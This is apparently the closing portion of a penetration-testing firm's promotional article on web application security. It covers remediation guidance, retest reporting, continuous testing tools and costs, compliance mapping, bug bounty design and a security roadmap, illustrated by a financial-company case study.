Remediation Guidance Best Practices
Generic recommendations like "sanitize user input" are useless. I provide specific, actionable guidance:
Effective vs. Ineffective Remediation Guidance:
Vulnerability | Ineffective Guidance | Effective Guidance |
|---|---|---|
SQL Injection | "Use parameterized queries" | "Replace line 247 in transferController.php:<br> |
XSS | "Encode output" | "In messageDisplay.js line 82, replace:<br> |
IDOR | "Implement authorization checks" | "Add authorization check before line 34 in accountAPI.php:<br> |
At TechVenture, I provided specific code fixes for every critical and high-severity finding, complete with:
Exact file and line numbers
Current vulnerable code
Secure replacement code
Unit test examples to verify the fix
Retest criteria (what I'll look for during validation testing)
This level of detail accelerated their remediation from an estimated 16 weeks to actual 11 weeks.
Validation and Retesting
Remediation isn't complete until validated. I always include retest results in final reports:
Retest Findings Format:
Original Finding | Severity | Remediation Status | Retest Result | Notes |
|---|---|---|---|---|
SQL Injection in Transfer API | Critical (9.8) | ✅ Fixed | ✅ Verified | Parameterized queries implemented across all database interactions, tested with 250+ injection payloads, no vulnerabilities detected |
Authentication Bypass | Critical (9.1) | ✅ Fixed | ✅ Verified | Server-side token validation implemented, token no longer returned in API response, email verification required |
Missing Authorization | Critical (9.0) | ✅ Fixed | ✅ Verified | Function-level access control implemented, tested all admin functions with non-admin accounts, access properly denied |
IDOR in Account Access | High (8.2) | ✅ Fixed | ⚠️ Partially Fixed | Ownership validation added to most endpoints, but /api/accounts/{id}/transactions still allows cross-account access (re-testing required) |
Stored XSS | High (7.8) | ✅ Fixed | ✅ Verified | Output encoding implemented, tested with 100+ XSS payloads, CSP header deployed, no JavaScript execution possible |
Race Condition | High (7.5) | ✅ Fixed | ✅ Verified | Transaction locking implemented, tested with 1,000 concurrent transfers, no race conditions detected |
This detailed retest report provided confidence that fixes were effective and highlighted the one remaining issue requiring additional work.
Phase 5: Continuous Security Testing Integration
One-time penetration testing is insufficient for modern development. I help organizations integrate continuous security testing into their SDLC:
Security Testing Throughout Development:
Development Stage | Testing Type | Frequency | Tools/Approach | Cost |
|---|---|---|---|---|
Development | Static Application Security Testing (SAST) | Every commit | SonarQube, Checkmarx, Semgrep | $20K-$80K/year |
Build | Dependency vulnerability scanning | Every build | Snyk, OWASP Dependency-Check | $15K-$50K/year |
Test | Dynamic Application Security Testing (DAST) | Daily/weekly | OWASP ZAP, Burp Suite automated | $10K-$40K/year |
Staging | Comprehensive automated scanning | Pre-release | Full DAST suite, authenticated scanning | $25K-$100K/year |
Production | Manual penetration testing | Quarterly | External security firm | $60K-$240K/year |
Production | Bug bounty program | Continuous | HackerOne, Bugcrowd | $50K-$500K/year |
Production | Runtime application self-protection (RASP) | Continuous | Contrast Security, Sqreen | $30K-$120K/year |
TechVenture implemented a comprehensive continuous testing program post-breach:
TechVenture Continuous Security Program:
Development Phase:
- SAST: Semgrep integrated into VS Code and CI/CD
- Pre-commit hooks: Block commits with high-severity findings
- Developer security training: Monthly workshops
- Cost: $45K/yearThis seems expensive until you compare it to their $91M breach cost—a 19,000% ROI if it prevents just one similar incident.
Phase 6: Compliance Framework Integration
Web application security testing integrates with virtually every major compliance framework. Smart organizations leverage testing to satisfy multiple requirements:
Framework-Specific Testing Requirements:
Framework | Specific Requirements | Testing Evidence Required | Integration Strategy |
|---|---|---|---|
PCI DSS 6.6 | Annual penetration test + after significant changes, addressing OWASP Top 10 | Full penetration test report, remediation evidence, retest results | Schedule annual test before QSA assessment, retest after each major release |
PCI DSS 11.3.1 | Internal penetration test annually | Network and application layer testing, exploitation evidence | Combine with 6.6 for efficiency, ensure both network and application coverage |
SOC 2 (CC7.1) | Security testing of system components | Test plans, results, remediation tracking | Map findings to trust service criteria, document control testing |
ISO 27001 (A.14.2.8) | System security testing | Test results, penetration test reports | Include in surveillance audits, demonstrate continuous improvement |
HIPAA | Regular security testing (§164.308(a)(8)) | Risk analysis integration, test results, remediation plans | Coordinate with annual risk assessment, focus on ePHI access controls |
NIST 800-53 (CA-8) | Penetration testing per organizational frequency | Test plans, findings, remediation, POA&Ms | Align with continuous monitoring program, integrate with risk management |
FedRAMP (CA-8) | Annual penetration testing by independent 3PAO | Detailed test plan, findings, POA&Ms, continuous monitoring integration | Schedule with annual assessment, ensure 3PAO qualified |
GDPR (Art. 32) | Regular testing and assessment of security measures | Evidence of appropriate technical measures, test results | Include in DPIA process, demonstrate security by design |
At TechVenture, their penetration testing program satisfied multiple compliance requirements:
Compliance Mapping:
Single Penetration Test Satisfies:
✓ PCI DSS 6.6 (Application security testing)
✓ PCI DSS 11.3.1 (Penetration testing)
✓ SOC 2 CC7.1 (Security testing)
✓ SOC 2 CC9.1 (Incident management - through finding remediation)
✓ State data breach laws (Reasonable security measures)This unified approach reduced compliance costs while providing more comprehensive security assurance.
Bug Bounty Program Integration
Bug bounty programs complement penetration testing by providing continuous security assessment from diverse perspectives:
Bug Bounty Program Design:
Component | Configuration | Rationale | Cost Implication |
|---|---|---|---|
Scope | Production applications, APIs, mobile apps | Focus researchers on critical assets | Wider scope = more findings = higher payout |
Reward Structure | Critical: $5K-$15K<br>High: $1K-$5K<br>Medium: $250-$1K<br>Low: $100-$250 | Competitive rates attract skilled researchers | Higher rates = more researchers = better findings |
Eligibility | Valid, previously unreported vulnerabilities affecting security | Clear rules prevent disputes | Well-defined scope reduces invalid submissions |
Response SLA | First response: 2 business days<br>Triage: 5 business days<br>Resolution: 30-90 days | Researcher satisfaction, program reputation | Requires dedicated program management |
Platform | HackerOne, Bugcrowd, Intigriti | Professional platform, managed disclosure, payment handling | 20% platform fee on bounties |
Private vs Public | Start private (invited researchers), expand to public after maturity | Control initial quality, scale gradually | Private = fewer but higher quality findings |
TechVenture launched a private bug bounty program 6 months after their major remediation:
TechVenture Bug Bounty Results (First Year):
Metric | Result | Impact |
|---|---|---|
Valid Submissions | 47 vulnerabilities | Continuous security improvement |
Severity Distribution | 2 Critical, 8 High, 23 Medium, 14 Low | Focus on actionable issues |
Total Bounties Paid | $127,000 | Fraction of single breach cost |
Average Response Time | 1.8 days (first response)<br>3.2 days (triage) | Strong researcher satisfaction (4.7/5 rating) |
Vulnerabilities Per Quarter | Q1: 18, Q2: 15, Q3: 9, Q4: 5 | Declining trend indicates improving security |
False Positive Rate | 12% | Well-defined scope and program rules |
"Our bug bounty program found 47 vulnerabilities in the first year—issues that would have waited until our next annual penetration test. The continuous feedback loop has been invaluable for maintaining security between formal assessments." — TechVenture CISO
The program paid for itself by finding issues before they could be exploited, while building positive relationships with the security research community.
Key Takeaways: Your Web Application Security Roadmap
After 15+ years and hundreds of penetration tests, these are the critical lessons that separate secure applications from breaches waiting to happen:
1. Automated Scanning Is Not Penetration Testing
Don't confuse compliance checkbox exercises with genuine security assessment. Automated tools are useful for finding low-hanging fruit, but manual testing by skilled professionals finds the vulnerabilities that lead to actual breaches—business logic flaws, authorization issues, and chained attacks that scanners can't detect.
2. The OWASP Top 10 Is Your Minimum Bar, Not Your Goal
Yes, you need to address SQL injection, XSS, and broken authentication. But business logic vulnerabilities, race conditions, and application-specific flaws are equally dangerous and far less likely to be caught by generic security controls. Focus on understanding your application's unique attack surface.
3. Authorization Is Harder Than Authentication
Most organizations spend 80% of their security effort on authentication (who you are) and 20% on authorization (what you can do). The reality is that authorization vulnerabilities—IDOR, privilege escalation, missing function-level access control—are more common and often more damaging. Every access decision needs explicit authorization validation.
4. Security Testing Must Be Continuous
Annual penetration testing finds point-in-time vulnerabilities. Modern development cycles deploy code weekly or daily—your security testing must keep pace. Integrate SAST, DAST, and dependency scanning into your CI/CD pipeline, complement with quarterly manual testing and continuous bug bounties.
5. Remediation Guidance Matters as Much as Finding Vulnerabilities
A 200-page report full of technical jargon and generic recommendations is worthless. Effective security assessment provides specific, actionable remediation guidance with code examples, verification criteria, and business context that enables rapid, correct fixes.
6. Test for Business Impact, Not Just Technical Vulnerabilities
SQL injection is severe because it enables unauthorized data access or modification—not because it's technically interesting. Always understand and communicate business impact. A vulnerability that could lead to $10M in fraudulent transfers deserves more attention than information disclosure with no business consequence.
7. Validation and Retesting Are Non-Negotiable
Fixing vulnerabilities isn't the end—you must validate that fixes are effective and don't introduce new issues. Always retest critical and high-severity findings. I've seen too many "fixed" vulnerabilities that were actually just moved or superficially patched.
The Path Forward: Building Genuine Application Security
Whether you're commissioning your first penetration test or overhauling a failing security program, here's the roadmap I recommend:
Immediate Actions (Week 1):
Inventory all web applications and APIs
Review any previous security assessment reports (if they exist)
Identify compliance requirements driving testing needs
Secure executive sponsorship and budget ($25K-$80K for comprehensive initial test)
Short Term (Months 1-3):
Commission comprehensive manual penetration test from qualified firm
Prioritize findings by business impact and CVSS severity
Create remediation roadmap with clear ownership and timelines
Begin addressing Critical and High findings (target: 100% remediation in 90 days)
Medium Term (Months 4-6):
Complete initial remediation
Conduct validation retest of all Critical/High findings
Integrate SAST and dependency scanning into CI/CD pipeline
Implement automated DAST scanning (weekly minimum)
Begin security training for development teams
Long Term (Months 7-12):
Establish quarterly penetration testing schedule
Launch private bug bounty program (consider public after initial maturity)
Implement WAF or RASP for production protection
Create security champions program within development teams
Establish security metrics and continuous improvement process
Ongoing:
Quarterly manual penetration testing
Continuous bug bounty program
Security regression testing for all code changes
Annual comprehensive assessment
Regular security training updates
This program transforms security from reactive incident response to proactive vulnerability management.
Your Next Steps: Don't Wait for Your SQL Injection
I shared TechVenture Financial's story because it represents a pattern I see repeatedly—organizations that treat security testing as a compliance checkbox instead of genuine risk management, then face catastrophic consequences when vulnerabilities are exploited.
Their $91 million breach could have been prevented by a $28,000 penetration test. That's not hindsight bias—it's the reality that manual security testing by skilled professionals finds the vulnerabilities that lead to actual breaches.
Here's what I recommend you do immediately:
Assess Your Current Testing: Are you doing automated scanning or genuine penetration testing? When was your last manual assessment? Do you even know what vulnerabilities exist in your applications?
Understand Your Risk: What's your most critical web application? What data does it handle? What would a breach cost? Financial loss, regulatory penalties, reputation damage—quantify your risk.
Commission Professional Testing: Don't cheap out on application security. A thorough manual penetration test costs $15,000-$80,000 depending on complexity, but provides assurance that automated scanning simply cannot deliver.
Build Continuous Testing: One-time testing is insufficient. Implement SAST/DAST in your CI/CD pipeline, conduct quarterly manual testing, and consider bug bounties for continuous assessment.
Take Remediation Seriously: Finding vulnerabilities is pointless if you don't fix them. Prioritize by business impact, assign clear ownership, set aggressive timelines, and validate all fixes.
At PentesterWorld, we've conducted hundreds of web application penetration tests across every industry—financial services, healthcare, e-commerce, SaaS, government, and more. We understand the OWASP methodology, the compliance requirements, the development realities, and most importantly—we know what vulnerabilities actually lead to breaches in production environments.
Whether you need a one-time comprehensive assessment, ongoing quarterly testing, remediation guidance for a failed audit, or help building a continuous security testing program, we have the expertise to transform your application security from checkbox compliance to genuine resilience.
Don't wait for your $12 million SQL injection. Build your application security program today.
Ready to understand your real web application security posture? Have questions about penetration testing methodology or compliance requirements? Visit PentesterWorld where we turn vulnerability reports into security transformation. Our team of experienced penetration testers has found the vulnerabilities before they became breaches. Let's secure your applications together.